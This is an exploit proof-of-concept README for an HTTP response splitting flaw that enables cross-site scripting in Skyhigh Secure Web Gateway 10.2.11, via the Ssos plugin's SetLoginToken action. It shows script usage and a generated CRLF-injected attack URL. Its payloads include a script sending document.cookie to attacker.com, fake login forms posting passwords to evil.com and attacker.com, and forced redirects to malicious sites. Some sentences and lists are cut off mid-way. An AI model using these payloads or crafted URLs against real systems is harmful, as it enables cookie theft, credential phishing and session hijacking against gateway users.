
Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
by 0PTS
Proof of Concept for the HTTP Response Splitting vulnerability in Skyhigh Secure Web Gateway (formerly McAfee Web Gateway).
Critical HTTP Response Splitting vulnerability in Skyhigh Secure Web Gateway, allowing remote execution of XSS attacks through arbitrary HTML/JavaScript code injection.
The vulnerability resides in the "Ssos" plugin (action SetLoginToken), which incorrectly handles URL parameters:
Since newline characters (\r\n / %0d%0a) are not sanitized, an attacker can:
Content-Type and Content-LengthThe browser ignores the rest of the response after a properly formed Content-Length, allowing full content spoofing.
python explot.py
# Basic XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"
# Redirect
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'
# Phishing form
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'
# URL only (quiet mode)
python explot.py -d example.com -p "<script>alert(1)</script>" -q
-d, --domain Target domain (default: google.com)
-x, --prefix URL path prefix (default: SWG internal path)
-p, --payload HTML/JavaScript payload
-q, --quiet Quiet mode - URL only
-v, --version Script version
-h, --help Help
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
[+] Target Domain: example.com
[+] Payload Length: 43 bytes
[+] URL Length: 234 chars
[+] Generated URL:
http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mwg-internal/*⚠️ WARNING: This tool is intended solely for:
Using it against systems without explicit owner permission is illegal.
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝